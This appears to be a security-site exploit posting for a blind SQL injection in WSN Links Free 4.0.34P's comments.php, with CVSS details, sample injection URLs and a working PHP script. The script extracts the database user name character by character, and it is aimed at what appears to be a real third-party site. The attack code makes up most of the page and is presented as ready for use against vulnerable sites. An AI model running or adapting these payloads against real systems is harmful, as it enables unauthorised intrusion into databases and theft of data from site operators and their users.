WSN Links Free 4.0.34P (comments.php) Blind SQL Injection Exploit

2009.02.05
Credit: Stack
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[-]Powered by WSN Links Free 4.0.34P Blind SQL Injection By Stack exploit: http://site.com/path/comments.php?id=1 and 2>1/* #the page fully loaded http://site.com/path/comments.php?id=1 and 1>3/* #page loaded whit any data and some error that say "No such content exists. The link you are following seems to have been incorrect." cheking the mysql version: http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=5 or http://site.com/path/comments.php?id=1%20and%20substring(@@version,1,1)=4 # you can exploting the bug white blind sql automatic toolz such as sqlmap or ... simple exploit to get user() <?php function stringtohex($string){ $hex = ''; for($i=0 ; $i<strlen($string) ; $i++) $hex .= base_convert(ord(substr($string, $i, 1)), 10, 16); return '0x'.$hex; } echo "=================================================\n"; echo " WSN Links Free 4.0.34P Blind SQL Injection \n"; echo " by Stack & bugtr4cker \n"; echo " usage: php $argv[0] \n"; echo "=================================================\n"; echo "\n[!] UserID : "; $id = intval(fgets(STDIN)); $url = "http://www.ossoba.com/wlinks/comments.php?id=$id"; # change http://localhost/wlinks/ by your vulnerable site $regexp = 'Your Name:'; $login_len = 0; $password_len = 0; $login = ''; $password = ''; $alphabet_Stack = array("a" , "b" , "c" , "d" , "e" , "f" , "g" , "h" , "i" , "j" , "k" , "l" , "m" , "n" , "o" , "p" , "q" , "r" , "s" , "t" , "u" , "v" , "w" , "x" , "y" , "z" , "0" , "1" , "2" , "3" , "4" , "5" , "6" , "7" , "8" , "9", "@", ":", "<", ">" ,'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','.','*','%','&#195;&#169;','&' ); echo "\n[+] BF Longeur User : "; $stop = false ; while($stop == false){ $lenregexp = stringtohex('^.{'.$login_len.'}$'); $xurl = $url."+AND+(SELECT+user())+REGEXP+$lenregexp/**" ; $rep = file_get_contents($xurl); if(preg_match("#$regexp#",$rep)){ echo $login_len ; $stop = true ; } if($stop == false) $login_len++ ; } echo "\n[+] BF du User : "; for($i=0; $i<= $login_len; $i++){ $ok = false ; foreach($alphabet_Stack as $Stackl){ if($ok == true) continue ; $like = stringtohex($login.$Stackl); $urlx = $url."+AND+(SELECT+user())+LIKE+concat($like,0x25)/*"; $rep = file_get_contents($urlx) ; if(preg_match("#$regexp#",$rep)){ echo $Stackl ; $login .= $Stackl ; $ok = true ; } } } echo "\n\n[+] Injection Completed \n"; echo "\t User : $login\n\t"; ?>

References:

http://www.milw0rm.com/exploits/6529
http://www.frsirt.com/english/advisories/2008/2656


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top